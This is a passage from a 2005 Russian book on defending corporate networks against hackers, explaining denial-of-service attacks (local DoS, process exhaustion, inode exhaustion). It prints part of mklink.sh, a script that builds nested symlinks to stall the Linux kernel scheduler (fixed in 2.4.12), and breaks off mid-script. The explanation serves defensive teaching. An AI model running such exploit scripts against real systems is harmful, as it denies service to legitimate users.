Защита от хакеров корпоративных сетей. Коллектив авторов

Читать онлайн.
Название Защита от хакеров корпоративных сетей
Автор произведения Коллектив авторов
Жанр Компьютеры: прочее
Серия
Издательство Компьютеры: прочее
Год выпуска 2005
isbn 5-98453-015-5



Скачать книгу

в обслуживании

      Что собой представляет атака, приводящая к отказу в обслуживании (DoS-атака)? О DoS-атаке говорят в том случае, когда в результате действий злоумышленника ресурс заблокирован или его функциональные возможности существенно ограничены. Другими словами, атака препятствует доступности ресурса его постоянным авторизованным пользователям. Атаки этого класса могут осуществляться как локально на автономной системе, так и удаленно через сеть. Они направлены на ограничение функциональных возможностей процессов, уменьшение объема запоминаемой информации, разрушение файлов. Подобные атаки преследуют цель сделать ресурс непригодным для работы или добиться завершения работы системы или процессов. Рассмотрим DoS-атаки подробнее.

Локальная DoS-атака

      Локальная DoS-атака встречается часто, и ее во многих случаях можно предотвратить. Несмотря на большой ущерб от атак этого класса, все же предпочтительнее иметь дело именно с ними. При грамотно реализованной системе безопасности этот класс атак легко отследить, а злоумышленника – идентифицировать.

      Локальная DoS-атака наиболее часто преследует следующие три цели: существенное снижение функциональных возможностей процесса, исчерпание места на диске и истощение индексных узлов (index node (inode) exhaustion).

      Снижение функциональных возможностей процесса

      По сути, каждый локальный отказ в обслуживании – это существенное снижение функциональных возможностей процессов вследствие снижения производительности системы из-за ее перегрузки в результате атаки злоумышленника. Перегрузка системы наступает из-за порождения процессов с повторяющейся структурой, которые пожирают доступные ресурсы хоста, переполнения таблицы системных процессов или из-за перегрузки центрального процессора, опять же в результате порождения слишком большого количества процессов.

      Известен вариант атаки этого класса, основанный на недавно найденной уязвимости в ядре Linux. Создавая систему вложенных символических ссылок, пользователь может помешать планированию выполнения других процессов во время разыменовывания символической ссылки. После создания вложенных символических ссылок, пытаясь выполнить один из связанных файлов, планировщик процесса блокируется, не позволяя другим процессам получить процессорное время. Ниже представлен исходный текст файла mklink.sh, который создает все необходимые ссылки в системе, подвергнувшейся нападению (эта проблема была полностью исправлена только в ядре Linux версии 2.4.12):

      #!/bin/sh

      # by Nergal

      mklink()

      {

      IND=$1

      NXT=$(($IND+1))

      EL=l$NXT/../

      P=“”

      I=0

      while [ $I -lt $ELNUM ] ; do

      P=$P“$EL”

      I=$(($I+1))

      done

      ln -s “$P”l$2 l$IND

      }

      #main program

      if [ $# != 1 ] ; then

      echo A numerical argument is required.

      exit 0

      fi

      ELNUM=$1

      mklink 4

      mklink 3

      mklink 2

      mklink 1

      mklink 0 /../../../../../../../etc/services

      mkdir l5

      mkdir